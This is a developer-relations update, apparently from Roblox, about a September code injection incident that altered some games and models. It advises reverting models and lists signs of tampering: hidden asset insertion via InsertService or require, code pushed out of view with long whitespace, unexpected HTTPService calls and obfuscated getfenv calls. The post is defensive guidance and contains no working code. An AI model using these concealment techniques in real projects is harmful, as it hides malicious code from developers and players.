Hey Developers,
We want to provide you with the latest update in regards to the code injection incident from Sept. 7-8 we communicated to you a couple of weeks ago: Recent Roblox Security Incident.
Many of you asked what we are doing to lock down the servers and provide extra security measures in the future. At this time, the goal is to provide you with an update on what we’ve done to ensure improvements in the security of the games created by our developer community. Here are a couple of the actionable items we have addressed:
- Completed a security audit of our infrastructure.
- Deployed continual automated auditing and scanning of our systems.
We will continue to work through our security roadmap to mitigate against potential security events in the future. Our priority is to continue providing open communication channels between our developer community and Roblox. In the future if you have information for us about a security vulnerability, please reach out to us directly and our team will actively collaborate with you to address the incident.
The insecure server was addressed immediately upon discovery and we are continuing to address the systematic issues resulting from this. Here’s what we learned from the incident:
- There were a handful of games that were confirmed with malicious code changes.
- We’ve identified a pattern from these incidents that we have been applying to our filters and potential other cases. If you have previously received an email from us regarding your place being potentially impacted, we highly encourage you to review your code and models carefully.
- We are aware of a few cases where models were impacted by unexpected code changes. Please keep in mind the potential impact in malicious models. We highly encourage you to actively begin auditing code in the models created by you or by others. We recommend that you review the code in your models for changes and if you are not sure revert to a version prior to Sept. 7.
- Remember, you can see a version history of your models by configuring them. You will see a history at the bottom of the configure page that looks like this:
Simply click on [ Make Current ] to switch your model back to an earlier version.
- Along with your own models, we recommend checking out any models made by other developers. There are guidelines below you can use to keep an eye out for malicious code.
- We are evaluating all reports related to this incident. If you discover any suspicious changes, please report those to us right away through devrelations@roblox.com so we can add those as part of the ongoing investigation on this incident.
- We have and will continue to do everything we can to reduce the risk from this incident. We ask you to be proactive in inspecting your code and models and reporting anything suspicious to us.
When you investigate your code (either in your scripts or models), there are a couple of common patterns to look out for:
- Insertion of arbitary models, either with InsertService or require(). You should make sure you are aware of all the assets that are inserted into your game.
- Lots of spaces. Sometimes a malicious coder will push their inserted text far to the right so it is not visible when simply scrolling through the file.
- HTTPService. You should be on the lookout for any web calls that are made to external services that you don’t have control over.
- Getfenv calls. Calls to various functions (such as the ones above) can be obfuscated using getfenv. Keep an eye out for any code that uses this function, particularly if the parameter that is passed in is long and complicated.
We want to assure you that we take incidents such as this one very seriously. We are actively working to close this particular issue and we will continue to look for other holes and exploits in the platform. Our goal is to make sure that we prevent as many issues as we can and to have quick and efficient response to issues we can’t prevent. The engagement level of our community is key to the success and security of our platform; therefore we highly encourage everyone to continue to report issues such as these directly to us. Please let us know if you have any further questions or concerns.
Thanks,
Developer Relations Team